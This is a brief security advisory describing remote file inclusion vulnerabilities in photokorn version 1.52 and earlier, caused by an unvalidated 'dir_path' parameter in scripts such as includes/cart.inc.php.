Multiple vulnerabilities have been identified in photokorn, which could be exploited by attackers to execute arbitrary commands. These flaws are due to input validation errors in various scripts (e.g. "includes/cart.inc.php" and "extras/ext_cat.php") that do not validate the "dir_path" parameter, which could be exploited by remote attackers to include malicious scripts and execute arbitrary commands with privileges of the web server.
Vulnerable Products
Vulnerable Software: photokorn version 1.52 and prior
